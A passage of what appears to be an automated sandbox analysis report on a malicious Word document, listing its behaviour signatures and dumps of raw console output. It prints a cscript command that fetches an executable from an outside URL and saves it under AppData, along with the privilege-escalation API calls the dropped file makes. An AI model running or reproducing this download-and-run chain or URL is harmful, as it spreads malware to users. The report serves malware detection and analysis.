Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AD2E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005BA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B2250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005BA620 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005F2250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005ED2E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005FA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 7_2_005FA620 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005B3600 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpW,lstrcmpW,Process32NextW,CloseHandle,lstrcmpW
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Code function: 5_2_005AD750 GetVersion,CoCreateInstance
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$98.doc
Creates mutexes
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{F10BE3EE-9073-8952-E70B-9EB847D507E5}
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Mutant created: \BaseNamedObjects\Global\{5CA4B01D-36F8-AA38-E7BE-3FCF59B1E70D}
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR672A.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: 98.doc | OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: 98.doc | OLE document summary: title field not present or empty
Source: 98.doc | OLE document summary: edited time not present or 0
Executes batch files
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Found command line output
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . . . .W.S.c.r.i.p.t...Q.u.i.t. .1. . ..................xH.<..J.....b.v..3|..+.\.+.(....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................i.t. .1. . ...............3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... . ...............3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...$............................... . ...............3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...*...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...I...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...U............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .E.n.d. .I.f. . ...[....................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...a.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...g.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...m.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...s...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p........................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p........................................xH.<..J.....b.v..3|..+.....b....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...$...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...0............................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...6.............................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...[.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...P...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...\............................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...b.............................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...`.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...y...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...e.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................xH.<..J.....b.v...u`.....+...+.....R.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.....R.............3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...j.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...O.p.e.n. . ....................xH.<..J.....b.v..3|..+.\.+.&....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................p.e.n. . .................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... .................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................... .................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p... ............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...T.y.p.e. .=. .1. . ............xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...,...........................y.p.e. .=. .1. . .........3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...2...........................=. .1. . .........3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...8...............................=. .1. . .........3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...>...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...{...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p........................................xH.<..J.....b.v..3|..+.....Z....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...P.o.s.i.t.i.o.n. .=. .0. . ....xH.<..J.....b.v..3|..+.\.+.6....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................o.s.i.t.i.o.n. .=. .0. ...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................i.o.n. .=. .0. ...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................i.o.n. .=. .0. ...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.......................................B.a.....x.H.......3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.............B.a.....x.H.......3|l.+.|.\...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p........................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...%.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...+.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...1.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...7...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...b............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...h....................................xH.<..J.....b.v..3|..+.....~....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...n.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...t.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...z.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.6.9.2.4.2.6.9.1.2.7.9.6.8.4.7.5................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.1.6.6.1.8.6.6.1.7.3.2.7.1.9.5.1................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.4.8.4.5.4.1.1.5.5.5.8.8.6.9.1.4................xH.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.......................................B.a.......F.......3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.............B.a.......F.......3|l.+.|.\...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.8.7.8.3.9.4.2.2.5.8.2.1.1.4.7.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.../.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...F...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.3.3.1.7.7.2.6.3.9.2.4.3.4.9.7.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...X.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...w...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.4.7.7.4.1.6.9.2.2.4.8.3.9.6.3.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.5.2.1.7.9.2.5.7.9.5.3.2.7.4.8.3.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.7.7.6.1.7.9.7.2.5.2.4.8.2.4.6.5.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.3.1.2.6.1.2.4.2.3.3.2.9.1.2.7.1.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.1.9.4.5.6.9.4.7.6.7.6.5.8.5.3.6.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...-.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...D...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.2.5.5.5.2.3.5.7.5.9.1.4.1.7.3.9.................I.<..J.....b.v...u`.....+...+.d.+.".............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V.............................+...+.|.\."...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+...I.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...m...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...y.............................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.........................................I.<..J.....b.v..3|..+..........E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p.................................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...S.a.v.e.T.o.F.i.l.e. .c.o.n.c.e.p.t. . ....b.v..3|..+.\.+.B....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................a.v.e.T.o.F.i.l.e. .c.o...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................o.F.i.l.e. .c.o...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................o.F.i.l.e. .c.o...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p.................................I.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.4...C.l.o.s.e. . ...................I.<..J.....b.v..3|..+.\.+.(....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................l.o.s.e. . ...............3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... . ...............3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...#............................... . ...............3|..3|..+.....Z....E.J....D.+.Jump to behavior
Might use command line arguments
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: 8192 | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: LoadResource | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: SizeofResource | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: LockResource | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: SkinTest | 5_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: 8192 | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: KERNEL32.DLL | 7_2_00401069
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe | Command line argument: LoadResource | 7_2_00401069
